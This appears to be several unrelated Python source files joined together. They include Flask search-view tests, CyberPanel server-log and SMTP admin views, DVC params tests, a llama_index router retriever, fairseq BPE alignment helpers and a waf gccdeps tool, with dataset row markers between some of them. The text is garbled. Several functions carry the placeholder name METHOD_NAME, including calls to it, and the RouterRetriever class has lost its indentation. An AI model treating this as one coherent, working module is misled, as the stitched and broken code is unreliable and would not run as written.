        for typeset in resultset:
            for field in ('type', 'label', 'count'):
                assert field in typeset
# --- Test views -----------------------------------------------------------------------
@pytest.mark.usefixtures('app_context', 'all_fixtures')
def test_view_search_counts(app, client, org_ankhmorpork, project_expo2010) -> None:
    """Search views return counts as a list of dicts."""
    org_ankhmorpork.make_profile_public()
    # Exercise the global, account, and project search endpoints alike.
    search_urls = (
        url_for('search'),
        org_ankhmorpork.url_for('search'),
        project_expo2010.url_for('search'),
    )
    for search_url in search_urls:
        resultset = client.get(
            search_url,
            query_string={'q': "test"},
            headers={'Accept': 'application/json'},
        ).get_json()
        assert isinstance(resultset, dict)
        assert 'counts' in resultset
        for countset in resultset['counts']:
            for field in ('type', 'label', 'count'):
                assert field in countset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_all_types)
def test_view_search_results_all(client, stype) -> None:
    """Global search view returns results for each type."""
    response = client.get(
        url_for('search'),
        query_string={'q': "test", 'type': stype},
        headers={'Accept': 'application/json'},
    )
    resultset = response.get_json()
    assert isinstance(resultset, dict)
    assert 'counts' in resultset
    for countset in resultset['counts']:
        for field in ('type', 'label', 'count'):
            assert field in countset
    assert 'results' in resultset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_profile_types)
def test_view_search_results_profile(client, org_ankhmorpork, stype) -> None:
    """Account search view returns results for each type."""
    org_ankhmorpork.make_profile_public()
    response = client.get(
        org_ankhmorpork.url_for('search'),
        query_string={'q': "test", 'type': stype},
        headers={'Accept': 'application/json'},
    )
    resultset = response.get_json()
    assert isinstance(resultset, dict)
    assert 'counts' in resultset
    for countset in resultset['counts']:
        for field in ('type', 'label', 'count'):
            assert field in countset
    assert 'results' in resultset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_project_types)
def test_view_search_results_project(client, project_expo2010, stype) -> None:
    """Project search view returns results for each type."""
    response = client.get(
        project_expo2010.url_for('search'),
        query_string={'q': "test", 'type': stype},
        headers={'Accept': 'application/json'},
    )
    resultset = response.get_json()
    assert isinstance(resultset, dict)
    assert 'counts' in resultset
    for countset in resultset['counts']:
        for field in ('type', 'label', 'count'):
            assert field in countset
    assert 'results' in resultset
# -*- coding: utf-8 -*-
from django.http import HttpResponse
import json
import plogical.CyberCPLogFileWriter as logging
from plogical.httpProc import httpProc
from plogical.installUtilities import installUtilities
from plogical.virtualHostUtilities import virtualHostUtilities
from plogical.acl import ACLManager
from plogical.processUtilities import ProcessUtilities
import os
# Create your views here.
def logsHome(request):
    """Render the server-logs landing page (admin template context)."""
    return httpProc(request, 'serverLogs/index.html', None, 'admin').render()
def accessLogs(request):
    """Render the web-server access-log viewer (admin template context).

    Renamed from the placeholder METHOD_NAME, matching the camelCase of the
    sibling views (errorLogs, emailLogs); presumably referenced by this name
    in the app's URLconf — confirm against urls.py.
    """
    proc = httpProc(request, 'serverLogs/accessLogs.html',
                    None, 'admin')
    return proc.render()
def errorLogs(request):
    """Render the web-server error-log viewer (admin template context)."""
    return httpProc(request, 'serverLogs/errorLogs.html', None, 'admin').render()
def ftplogs(request):
    """Render the FTP log viewer (admin template context)."""
    return httpProc(request, 'serverLogs/ftplogs.html', None, 'admin').render()
def emailLogs(request):
    """Render the mail log viewer (admin template context)."""
    return httpProc(request, 'serverLogs/emailLogs.html', None, 'admin').render()
def modSecAuditLogs(request):
    """Render the ModSecurity audit-log viewer (admin template context)."""
    return httpProc(request, 'serverLogs/modSecAuditLog.html', None, 'admin').render()
def getLogsFromFile(request):
    """Return the last 50 lines of a selected server log as JSON.

    POST body: ``{"type": "access"|"error"|"email"|"ftp"|"modSec"|"cyberpanel"}``.
    Admin-only; non-admins receive an ACL error payload.
    """
    try:
        userID = request.session['userID']
        currentACL = ACLManager.loadedACL(userID)
        if currentACL['admin'] != 1:
            return ACLManager.loadErrorJson('logstatus', 0)

        data = json.loads(request.body)
        logType = data['type']  # renamed: `type` shadowed the builtin

        # Distro decides where syslog/maillog live.
        onRHELFamily = ProcessUtilities.decideDistro() in (
            ProcessUtilities.centos, ProcessUtilities.cent8)

        if logType == "access":
            fileName = installUtilities.Server_root_path + "/logs/access.log"
        elif logType == "error":
            fileName = installUtilities.Server_root_path + "/logs/error.log"
        elif logType == "email":
            fileName = "/var/log/maillog" if onRHELFamily else "/var/log/mail.log"
        elif logType == "ftp":
            fileName = "/var/log/messages" if onRHELFamily else "/var/log/syslog"
        elif logType == "modSec":
            fileName = "/usr/local/lsws/logs/auditmodsec.log"
        elif logType == "cyberpanel":
            fileName = "/home/cyberpanel/error-logs.txt"
        else:
            # Previously an unknown type left fileName unbound, crashing
            # with an unhandled NameError; report a clean error instead.
            status = {"status": 0, "logstatus": 0,
                      "error": "Unknown log type requested."}
            return HttpResponse(json.dumps(status))

        try:
            command = "sudo tail -50 " + fileName
            fewLinesOfLogFile = ProcessUtilities.outputExecutioner(command)
            status = {"status": 1, "logstatus": 1, "logsdata": fewLinesOfLogFile}
            return HttpResponse(json.dumps(status))
        except BaseException:
            # Best-effort: an unreadable/missing file is reported as empty.
            status = {"status": 1, "logstatus": 1, "logsdata": 'Empty File.'}
            return HttpResponse(json.dumps(status))
    except KeyError as msg:
        status = {"status": 0, "logstatus": 0,
                  "error": "Could not fetch data from log file, please see CyberCP main log file through command line."}
        logging.CyberCPLogFileWriter.writeToFile(str(msg) + "[getLogsFromFile]")
        return HttpResponse(json.dumps(status))
def clearLogFile(request):
    """Truncate a server log file chosen via POST JSON (admin only).

    Delegates the actual truncation to serverLogs.py through
    ProcessUtilities; returns ``{'cleanStatus': 1|0, 'error_message': ...}``.
    """
    try:
        userID = request.session['userID']
        currentACL = ACLManager.loadedACL(userID)
        if currentACL['admin'] != 1:
            return ACLManager.loadErrorJson('cleanStatus', 0)
        try:
            if request.method == 'POST':
                import shlex  # local import: only needed on this path

                data = json.loads(request.body)
                fileName = data['fileName']
                # Security: fileName comes from the request body and is
                # interpolated into a shell command line — quote it so it
                # cannot inject additional arguments or commands.
                execPath = "/usr/local/CyberCP/bin/python " + virtualHostUtilities.cyberPanel + "/plogical/serverLogs.py"
                execPath = execPath + " cleanLogFile --fileName " + shlex.quote(fileName)
                output = ProcessUtilities.outputExecutioner(execPath)
                if output.find("1,None") > -1:
                    data_ret = {'cleanStatus': 1, 'error_message': "None"}
                else:
                    data_ret = {'cleanStatus': 0, 'error_message': output}
                return HttpResponse(json.dumps(data_ret))
            # Non-POST requests fall through (implicitly returns None),
            # preserving the original behaviour.
        except BaseException as msg:
            data_ret = {'cleanStatus': 0, 'error_message': str(msg)}
            return HttpResponse(json.dumps(data_ret))
    except KeyError as msg:
        logging.CyberCPLogFileWriter.writeToFile(str(msg))
        data_ret = {'cleanStatus': 0, 'error_message': str(msg)}
        return HttpResponse(json.dumps(data_ret))
def serverMail(request):
    """Render the SMTP-settings page, pre-filled with any saved values."""
    smtpPath = '/home/cyberpanel/smtpDetails'
    data = {}
    if os.path.exists(smtpPath):
        # Context manager fixes the original leaked file handle
        # (open(...).read() never closed the file).
        with open(smtpPath, 'r') as smtpFile:
            mailSettings = json.loads(smtpFile.read())
        data['smtpHost'] = mailSettings['smtpHost']
        data['smtpPort'] = mailSettings['smtpPort']
        data['smtpUserName'] = mailSettings['smtpUserName']
        data['smtpPassword'] = mailSettings['smtpPassword']
    proc = httpProc(request, 'serverLogs/serverMail.html',
                    data, 'admin')
    return proc.render()
def saveSMTPSettings(request):
    """Validate and persist SMTP settings posted by an admin.

    If mailer != 'SMTP' the saved settings file is removed. Otherwise the
    credentials are verified by logging in to the SMTP server before being
    written (0600) to /home/cyberpanel/smtpDetails.
    """
    try:
        userID = request.session['userID']
        currentACL = ACLManager.loadedACL(userID)
        if currentACL['admin'] != 1:
            return ACLManager.loadErrorJson('logstatus', 0)

        data = json.loads(request.body)
        mailer = data['mailer']
        smtpPath = '/home/cyberpanel/smtpDetails'

        if mailer != 'SMTP':
            if os.path.exists(smtpPath):
                os.remove(smtpPath)
        else:
            import smtplib
            smtpHost = data['smtpHost']
            smtpPort = data['smtpPort']
            smtpUserName = data['smtpUserName']
            smtpPassword = data['smtpPassword']
            try:
                verifyLogin = smtplib.SMTP(str(smtpHost), int(smtpPort))
                if int(smtpPort) == 587:
                    verifyLogin.starttls()
                verifyLogin.login(str(smtpUserName), str(smtpPassword))
                # Context manager fixes the original unclosed file handle.
                with open(smtpPath, 'w') as settingsFile:
                    settingsFile.write(json.dumps(data))
                command = 'chmod 600 %s' % (smtpPath)
                ProcessUtilities.executioner(command)
                try:
                    # Close the verification connection (was leaked before).
                    verifyLogin.quit()
                except smtplib.SMTPException:
                    pass
            except smtplib.SMTPHeloError:
                data_ret = {"status": 0, 'error_message': 'The server did not reply properly to the HELO greeting.'}
                return HttpResponse(json.dumps(data_ret))
            except smtplib.SMTPAuthenticationError:
                data_ret = {"status": 0, 'error_message': 'Username and password combination not accepted.'}
                return HttpResponse(json.dumps(data_ret))
            except smtplib.SMTPException:
                data_ret = {"status": 0, 'error_message': 'No suitable authentication method was found.'}
                return HttpResponse(json.dumps(data_ret))

        status = {"status": 1}
        return HttpResponse(json.dumps(status))
    except BaseException as msg:
        status = {"status": 0, 'error_message': str(msg)}
        return HttpResponse(json.dumps(status))
import operator
from functools import reduce
import pytest
from dvc.repo import Repo
from dvc.repo.stage import PROJECT_FILE
from dvc.utils.serialize import YAMLFileCorruptedError
def test_show_empty(dvc):
    """With no params tracked, show() yields an empty mapping."""
    result = dvc.params.show()
    assert result == {}
def test_show(tmp_dir, dvc):
    """A tracked param appears under the default (workspace) revision."""
    tmp_dir.gen("params.yaml", "foo: bar")
    dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
    expected = {"": {"data": {"params.yaml": {"data": {"foo": "bar"}}}}}
    assert dvc.params.show() == expected
def test_show_targets(tmp_dir, dvc):
    """Targets may be given as a list of names or a single fs path."""
    tmp_dir.gen("params.yaml", "foo: bar")
    dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
    expected = {"": {"data": {"params.yaml": {"data": {"foo": "bar"}}}}}
    for target in (["params.yaml"], (tmp_dir / "params.yaml").fs_path):
        assert dvc.params.show(targets=target) == expected
def test_show_toml(tmp_dir, dvc):
    """TOML params files are parsed, including tables and arrays."""
    tmp_dir.gen("params.toml", "[foo]\nbar = 42\nbaz = [1, 2]\n")
    dvc.run(cmd="echo params.toml", params=["params.toml:foo"], name="echo-params")
    expected = {
        "": {"data": {"params.toml": {"data": {"foo": {"bar": 42, "baz": [1, 2]}}}}}
    }
    assert dvc.params.show() == expected
def test_show_py(tmp_dir, dvc):
    """Python params files expose constants, annotated names, class attrs."""
    tmp_dir.gen(
        "params.py",
        "CONST = 1\nIS_DIR: bool = True\n\n\nclass Config:\n    foo = 42\n",
    )
    dvc.run(
        cmd="echo params.py",
        params=["params.py:CONST,IS_DIR,Config.foo"],
        name="echo-params",
    )
    expected = {
        "": {
            "data": {
                "params.py": {
                    "data": {"CONST": 1, "Config": {"foo": 42}, "IS_DIR": True}
                }
            }
        }
    }
    assert dvc.params.show() == expected
def test_show_multiple(tmp_dir, dvc):
    """Params tracked by separate stages are merged per params file."""
    tmp_dir.gen("params.yaml", "foo: bar\nbaz: qux\n")
    for key, stage_name in (("foo", "echo-params1"), ("baz", "echo-params2")):
        dvc.run(cmd="echo params.yaml", params=[key], name=stage_name)
    expected = {"": {"data": {"params.yaml": {"data": {"baz": "qux", "foo": "bar"}}}}}
    assert dvc.params.show() == expected
def test_show_list(tmp_dir, dvc):
    """List-valued params round-trip through show()."""
    tmp_dir.gen("params.yaml", "foo:\n- bar\n- baz\n")
    dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
    expected = {"": {"data": {"params.yaml": {"data": {"foo": ["bar", "baz"]}}}}}
    assert dvc.params.show() == expected
def test_show_branch(tmp_dir, scm, dvc):
    """show(revs=...) reports both the branch and the workspace values."""
    tmp_dir.gen("params.yaml", "foo: bar")
    dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
    scm.add(["params.yaml", "Dvcfile"])
    scm.commit("init")

    with tmp_dir.branch("branch", new=True):
        tmp_dir.scm_gen("params.yaml", "foo: baz", commit="branch")

    expected = {
        "branch": {"data": {"params.yaml": {"data": {"foo": "baz"}}}},
        "workspace": {"data": {"params.yaml": {"data": {"foo": "bar"}}}},
    }
    assert dvc.params.show(revs=["branch"]) == expected
def test_pipeline_params(tmp_dir, scm, dvc, run_copy):
    """deps=True limits show() to the params declared by pipeline stages.

    Renamed from the placeholder METHOD_NAME so pytest collects it.
    """
    tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
    run_copy("foo", "bar", name="copy-foo-bar", params=["foo,xyz"])
    scm.add(["params.yaml", PROJECT_FILE])
    scm.commit("add stage")
    tmp_dir.scm_gen("params.yaml", "foo: baz\nxyz: val\nabc: ignore", commit="baz")
    tmp_dir.scm_gen("params.yaml", "foo: qux\nxyz: val\nabc: ignore", commit="qux")

    # With deps=True only the stage-declared params ('foo', 'xyz') appear.
    assert dvc.params.show(revs=["master"], deps=True) == {
        "master": {"data": {"params.yaml": {"data": {"foo": "qux", "xyz": "val"}}}}
    }
    # Without deps, every key in the params file is reported.
    assert dvc.params.show(revs=["master"]) == {
        "master": {
            "data": {
                "params.yaml": {"data": {"abc": "ignore", "foo": "qux", "xyz": "val"}}
            }
        }
    }
def test_show_no_repo(tmp_dir):
    """show() works in an uninitialized directory when targets are given."""
    tmp_dir.gen({"foo": "foo", "params_file.yaml": "foo: bar\nxyz: val"})
    dvc = Repo(uninitialized=True)
    expected = {
        "": {"data": {"params_file.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
    }
    assert dvc.params.show(targets=["params_file.yaml"]) == expected
@pytest.mark.parametrize(
    "file,error_path",
    (
        # error_path is the key path into show()'s result where the parse
        # error object is expected for the corrupted file.
        (PROJECT_FILE, ["v1", "error"]),
        ("params_other.yaml", ["v1", "data", "params_other.yaml", "error"]),
    ),
)
def test_log_errors(tmp_dir, scm, dvc, capsys, file, error_path):
    # Corrupt one file, commit+tag the corrupted state as v1, then restore
    # the workspace copy so only the v1 revision is malformed.
    tmp_dir.gen("params_other.yaml", "foo: bar")
    dvc.run(
        cmd="echo params_other.yaml",
        params=["params_other.yaml:foo"],
        name="train",
    )
    rename = (tmp_dir / file).read_text()
    with open(tmp_dir / file, "a", encoding="utf-8") as fd:
        fd.write("\nmalformed!")
    scm.add([PROJECT_FILE, "params_other.yaml"])
    scm.commit("init")
    scm.tag("v1")
    (tmp_dir / file).write_text(rename)
    result = dvc.params.show(revs=["v1"])
    _, error = capsys.readouterr()
    # Walk error_path into the nested result dict to reach the error object.
    assert isinstance(
        reduce(operator.getitem, error_path, result), YAMLFileCorruptedError
    )
    assert "DVC failed to load some parameters for following revisions: 'v1'." in error
@pytest.mark.parametrize("file", ["params.yaml", "other_params.yaml"])
def test_show_without_targets_specified(tmp_dir, dvc, scm, file):
    """A stage tracking a whole params file surfaces all of its data."""
    data = {"foo": {"bar": "bar"}, "x": "0"}
    (tmp_dir / file).dump(data)
    dvc.stage.add(name="test", cmd=f"echo {file}", params=[{file: None}])
    assert dvc.params.show() == {"": {"data": {file: {"data": data}}}}
def test_deps_multi_stage(tmp_dir, scm, dvc, run_copy):
    """deps=True unions params declared across multiple stages."""
    tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
    run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
    run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
    scm.add(["params.yaml", PROJECT_FILE])
    scm.commit("add stage")
    expected = {
        "master": {"data": {"params.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
    }
    assert dvc.params.show(revs=["master"], deps=True) == expected
def test_deps_with_targets(tmp_dir, scm, dvc, run_copy):
    """Targets combine with deps=True to filter down to stage params."""
    tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
    run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
    run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
    scm.add(["params.yaml", PROJECT_FILE])
    scm.commit("add stage")
    expected = {
        "": {"data": {"params.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
    }
    assert dvc.params.show(targets=["params.yaml"], deps=True) == expected
def test_deps_with_bad_target(tmp_dir, scm, dvc, run_copy):
    """A target that is not a params file yields nothing with deps=True."""
    tmp_dir.gen(
        {
            "foo": "foo",
            "foobar": "",
            "params.yaml": "foo: bar\nxyz: val\nabc: ignore",
        }
    )
    run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
    run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
    scm.add(["params.yaml", PROJECT_FILE])
    scm.commit("add stage")
    result = dvc.params.show(targets=["foobar"], deps=True)
    assert result == {}
"""Router retriever."""
import logging
from typing import List, Optional, Sequence
import asyncio
from llama_index.schema import NodeWithScore
from llama_index.callbacks.schema import CBEventType, EventPayload
from llama_index.indices.base_retriever import BaseRetriever
from llama_index.indices.query.schema import QueryBundle
from llama_index.indices.service_context import ServiceContext
from llama_index.selectors.utils import get_selector_from_context
from llama_index.selectors.types import BaseSelector
from llama_index.tools.retriever_tool import RetrieverTool
logger = logging.getLogger(__name__)
class RouterRetriever(BaseRetriever):
"""Router retriever.
Selects one (or multiple) out of several candidate retrievers to execute a query.
Args:
selector (BaseSelector): A selector that chooses one out of many options based
on each candidate's metadata and query.
retriever_tools (Sequence[RetrieverTool]): A sequence of candidate
retrievers. They must be wrapped as tools to expose metadata to
the selector.
service_context (Optional[ServiceContext]): A service context.
"""
def __init__(
self,
selector: BaseSelector,
retriever_tools: Sequence[RetrieverTool],
service_context: Optional[ServiceContext] = None,
) -> None:
self.service_context = service_context or ServiceContext.METHOD_NAME()
self._selector = selector
self._retrievers: List[BaseRetriever] = [x.retriever for x in retriever_tools]
self._metadatas = [x.metadata for x in retriever_tools]
self.callback_manager = self.service_context.callback_manager
@classmethod
def METHOD_NAME(
cls,
retriever_tools: Sequence[RetrieverTool],
service_context: Optional[ServiceContext] = None,
selector: Optional[BaseSelector] = None,
select_multi: bool = False,
) -> "RouterRetriever":
selector = selector or get_selector_from_context(
service_context or ServiceContext.METHOD_NAME(), is_multi=select_multi
)
return cls(
selector,
retriever_tools,
service_context=service_context,
)
def _retrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore]:
with self.callback_manager.event(
CBEventType.RETRIEVE,
payload={EventPayload.QUERY_STR: query_bundle.query_str},
) as query_event:
result = self._selector.select(self._metadatas, query_bundle)
if len(result.inds) > 1:
retrieved_results = {}
for i, engine_ind in enumerate(result.inds):
logger.info(
f"Selecting retriever {engine_ind}: " f"{result.reasons[i]}."
)
selected_retriever = self._retrievers[engine_ind]
cur_results = selected_retriever.retrieve(query_bundle)
retrieved_results.update({n.node.node_id: n for n in cur_results})
else:
try:
selected_retriever = self._retrievers[result.ind]
logger.info(f"Selecting retriever {result.ind}: {result.reason}.")
except ValueError as e:
raise ValueError("Failed to select retriever") from e
cur_results = selected_retriever.retrieve(query_bundle)
retrieved_results = {n.node.node_id: n for n in cur_results}
query_event.on_end(payload={EventPayload.NODES: retrieved_results})
return list(retrieved_results.values())
    async def _aretrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore]:
        """Async counterpart of _retrieve; multi-selection fans out to all
        selected retrievers concurrently via asyncio.gather."""
        with self.callback_manager.event(
            CBEventType.RETRIEVE,
            payload={EventPayload.QUERY_STR: query_bundle.query_str},
        ) as query_event:
            result = await self._selector.aselect(self._metadatas, query_bundle)
            if len(result.inds) > 1:
                retrieved_results = {}
                tasks = []
                for i, engine_ind in enumerate(result.inds):
                    logger.info(
                        f"Selecting retriever {engine_ind}: " f"{result.reasons[i]}."
                    )
                    selected_retriever = self._retrievers[engine_ind]
                    tasks.append(selected_retriever.aretrieve(query_bundle))
                # Run all selected retrievers concurrently, then flatten the
                # per-retriever result lists into one list.
                results_of_results = await asyncio.gather(*tasks)
                cur_results = [
                    item for sublist in results_of_results for item in sublist
                ]
                # De-duplicate merged results by node_id.
                retrieved_results.update({n.node.node_id: n for n in cur_results})
            else:
                # `result.ind` presumably raises ValueError when no single
                # index is available — TODO confirm against selector impl.
                try:
                    selected_retriever = self._retrievers[result.ind]
                    logger.info(f"Selecting retriever {result.ind}: {result.reason}.")
                except ValueError as e:
                    raise ValueError("Failed to select retriever") from e
                cur_results = await selected_retriever.aretrieve(query_bundle)
                retrieved_results = {n.node.node_id: n for n in cur_results}
            query_event.on_end(payload={EventPayload.NODES: retrieved_results})
        return list(retrieved_results.values())
298,460 | spacy tokenizer | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import Counter
from typing import List
import torch
def align_bpe_to_words(roberta, bpe_tokens: torch.LongTensor, other_tokens: List[str]):
    """
    Helper to align GPT-2 BPE to other tokenization formats (e.g., spaCy).

    Args:
        roberta (RobertaHubInterface): RoBERTa instance
        bpe_tokens (torch.LongTensor): GPT-2 BPE tokens of shape `(T_bpe)`
        other_tokens (List[str]): other tokens of shape `(T_words)`

    Returns:
        List[str]: mapping from *other_tokens* to corresponding *bpe_tokens*.
    """
    assert bpe_tokens.dim() == 1
    # The sequence must begin with index 0, i.e. the <s> BOS token.
    assert bpe_tokens[0] == 0

    def clean(text):
        return text.strip()

    # remove whitespaces to simplify alignment
    bpe_tokens = [roberta.task.source_dictionary.string([x]) for x in bpe_tokens]
    bpe_tokens = [clean(roberta.bpe.decode(x) if x not in {'<s>', ''} else x) for x in bpe_tokens]
    other_tokens = [clean(str(o)) for o in other_tokens]

    # strip leading <s>
    bpe_tokens = bpe_tokens[1:]
    # After whitespace removal both tokenizations must cover the exact same
    # character sequence, otherwise alignment is impossible.
    assert ''.join(bpe_tokens) == ''.join(other_tokens)

    # create alignment from every word to a list of BPE tokens
    alignment = []
    # Enumerate from 1 because position 0 is the stripped <s>; empty BPE
    # strings carry no characters and are skipped.
    bpe_toks = filter(lambda item: item[1] != '', enumerate(bpe_tokens, start=1))
    j, bpe_tok = next(bpe_toks)
    for other_tok in other_tokens:
        bpe_indices = []
        while True:
            if other_tok.startswith(bpe_tok):
                # BPE token is a prefix of the word: consume it and advance.
                bpe_indices.append(j)
                other_tok = other_tok[len(bpe_tok):]
                try:
                    j, bpe_tok = next(bpe_toks)
                except StopIteration:
                    j, bpe_tok = None, None
            elif bpe_tok.startswith(other_tok):
                # other_tok spans multiple BPE tokens
                bpe_indices.append(j)
                bpe_tok = bpe_tok[len(other_tok):]
                other_tok = ''
            else:
                raise Exception('Cannot align "{}" and "{}"'.format(other_tok, bpe_tok))
            if other_tok == '':
                break
        assert len(bpe_indices) > 0
        alignment.append(bpe_indices)
    assert len(alignment) == len(other_tokens)
    return alignment
def align_features_to_words(roberta, features, alignment):
    """
    Align given features to words.

    Args:
        roberta (RobertaHubInterface): RoBERTa instance (unused here; kept
            for API compatibility)
        features (torch.Tensor): features to align of shape `(T_bpe x C)`
        alignment: alignment between BPE tokens and words returned by
            func:`align_bpe_to_words`.
    """
    assert features.dim() == 2

    # Count how many words each BPE position feeds, so its feature mass can
    # be split evenly among them; unreferenced positions keep weight 1.
    usage = Counter(idx for word in alignment for idx in word)
    assert usage[0] == 0  # <s> shouldn't be aligned
    scale = features.new([usage.get(j, 1) for j in range(len(features))])
    shared = features / scale.unsqueeze(-1)

    # Word features are the sum of their (weighted) BPE features; <s> leads.
    pieces = [shared[0]]
    max_idx = -1
    for word in alignment:
        pieces.append(shared[word].sum(dim=0))
        max_idx = max(max_idx, *word)
    # Trailing positions no word consumed (e.g. </s>) pass through unchanged.
    pieces.extend(shared[j] for j in range(max_idx + 1, len(features)))
    stacked = torch.stack(pieces)
    # Sanity check: redistribution preserves the total feature mass.
    assert torch.all(torch.abs(stacked.sum(dim=0) - features.sum(dim=0)) < 1e-4)
    return stacked
def spacy_nlp():
    """Return a lazily-created, cached spaCy English pipeline."""
    cached = getattr(spacy_nlp, '_nlp', None)
    if cached is not None:
        return cached
    try:
        from spacy.lang.en import English
        spacy_nlp._nlp = English()
    except ImportError:
        raise ImportError('Please install spacy with: pip install spacy')
    return spacy_nlp._nlp
def METHOD_NAME():
    """Return a cached spaCy tokenizer built from the shared English pipeline."""
    if getattr(METHOD_NAME, '_tokenizer', None) is None:
        try:
            nlp = spacy_nlp()
            # NOTE(review): Defaults.create_tokenizer was removed in spaCy v3;
            # presumably this targets spaCy v2 — verify the pinned version.
            METHOD_NAME._tokenizer = nlp.Defaults.create_tokenizer(nlp)
        except ImportError:
            raise ImportError('Please install spacy with: pip install spacy')
    return METHOD_NAME._tokenizer
298,461 | remove makefile rule lhs | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2008-2010 (ita)
"""
Execute the tasks with gcc -MD, read the dependencies from the .d file
and prepare the dependency calculation for the next run.
This affects the cxx class, so make sure to load Qt5 after this tool.
Usage::
def options(opt):
opt.load('compiler_cxx')
def configure(conf):
conf.load('compiler_cxx gccdeps')
"""
import os, re, threading
from waflib import Task, Logs, Utils, Errors
from waflib.Tools import c_preproc
from waflib.TaskGen import before_method, feature
# Guards the shared node-lookup cache accessed from worker threads.
lock = threading.Lock()

# Dependency-emitting compile flag; switched to -MMD below unless the
# preprocessor is configured for absolute paths (see c_preproc.go_absolute).
gccdeps_flags = ['-MD']
if not c_preproc.go_absolute:
    gccdeps_flags = ['-MMD']

# Third-party tools are allowed to add extra names in here with append()
supported_compilers = ['gcc', 'icc', 'clang']
def scan(self):
    """Skip the Python-level preprocessor scan for gccdeps-enabled task
    classes; the dependencies recorded by post_run are reused instead."""
    if self.__class__.__name__ not in self.env.ENABLE_GCCDEPS:
        return super(self.derived_gccdeps, self).scan()
    deps = self.generator.bld.node_deps.get(self.uid(), [])
    # No named (unresolved) dependencies in this mode.
    return (deps, [])
# Matches the trailing ".o" of an object file path (used to derive ".d").
re_o = re.compile(r"\.o$")
re_splitter = re.compile(r'(?<!\\)\s+')  # split by space, except when spaces are escaped
def METHOD_NAME(line):
    """Return the right-hand side of a Makefile dependency rule line.

    A bare ':' cannot delimit the rule because Windows absolute paths
    (e.g. ``C:\\foo``) contain one, so the LHS/RHS divider is detected as
    a colon followed by a space. Lines without a divider pass through
    unchanged.
    """
    lhs, sep, rhs = line.partition(': ')
    return rhs if sep else line
def path_to_node(base_node, path, cached_nodes):
    """Resolve *path* against *base_node*, memoizing in *cached_nodes*.

    Searching the node tree is expensive, so results (including misses) are
    cached. This runs on worker threads, hence the lock around cache access.
    """
    if getattr(path, '__hash__'):
        node_lookup_key = (base_node, path)
    else:
        # Not hashable: assume a list of components and join into a string
        node_lookup_key = (base_node, os.path.sep.join(path))
    # `with` guarantees the lock is released on any exception and — unlike the
    # previous acquire-inside-try/finally-release — cannot attempt to release
    # a lock that was never acquired.
    with lock:
        try:
            node = cached_nodes[node_lookup_key]
        except KeyError:
            node = base_node.find_resource(path)
            cached_nodes[node_lookup_key] = node
    return node
def post_run(self):
    """Read the compiler-generated .d file and record the implicit
    dependencies of this task for the next build run."""
    if not self.__class__.__name__ in self.env.ENABLE_GCCDEPS:
        return super(self.derived_gccdeps, self).post_run()

    # Derive the .d file name from the object file name.
    name = self.outputs[0].abspath()
    name = re_o.sub('.d', name)
    try:
        txt = Utils.readf(name)
    except EnvironmentError:
        Logs.error('Could not find a .d dependency file, are cflags/cxxflags overwritten?')
        raise
    #os.remove(name)

    # Compilers have the choice to either output the file's dependencies
    # as one large Makefile rule:
    #
    #   /path/to/file.o: /path/to/dep1.h \
    #                    /path/to/dep2.h \
    #                    ...
    #
    # or as many individual rules:
    #
    #   /path/to/file.o: /path/to/dep1.h
    #   /path/to/file.o: /path/to/dep2.h
    #   ...
    #
    # So the first step is to sanitize the input by stripping out the left-
    # hand side of all these lines. After that, whatever remains are the
    # implicit dependencies of task.outputs[0]
    txt = '\n'.join([METHOD_NAME(line) for line in txt.splitlines()])

    # Now join all the lines together (undo backslash-newline continuations)
    txt = txt.replace('\\\n', '')

    # Split on unescaped whitespace, then unescape spaces inside each path.
    val = txt.strip()
    val = [x.replace('\\ ', ' ') for x in re_splitter.split(val) if x]

    nodes = []
    bld = self.generator.bld

    # Dynamically bind to the cache
    try:
        cached_nodes = bld.cached_nodes
    except AttributeError:
        cached_nodes = bld.cached_nodes = {}

    for x in val:
        node = None
        if os.path.isabs(x):
            node = path_to_node(bld.root, x, cached_nodes)
        else:
            # TODO waf 1.9 - single cwd value
            path = getattr(bld, 'cwdx', bld.bldnode)
            # when calling find_resource, make sure the path does not contain '..'
            x = [k for k in Utils.split_path(x) if k and k != '.']
            while '..' in x:
                idx = x.index('..')
                if idx == 0:
                    x = x[1:]
                    path = path.parent
                else:
                    del x[idx]
                    del x[idx-1]
            node = path_to_node(path, x, cached_nodes)

        if not node:
            raise ValueError('could not find %r for %r' % (x, self))
        if id(node) == id(self.inputs[0]):
            # ignore the source file, it is already in the dependencies
            # this way, successful config tests may be retrieved from the cache
            continue
        nodes.append(node)

    Logs.debug('deps: gccdeps for %s returned %s', self, nodes)

    # Persist the dependency list and drop the cached signature so it gets
    # recomputed against the fresh dependencies.
    bld.node_deps[self.uid()] = nodes
    bld.raw_deps[self.uid()] = []
    try:
        del self.cache_sig
    except AttributeError:
        pass
    Task.Task.post_run(self)
def sig_implicit_deps(self):
    """Compute the implicit-dependency signature, degrading to SIG_NIL on
    failure so the task is rebuilt (and a fresh .d file produced) rather
    than aborting the build."""
    if not self.__class__.__name__ in self.env.ENABLE_GCCDEPS:
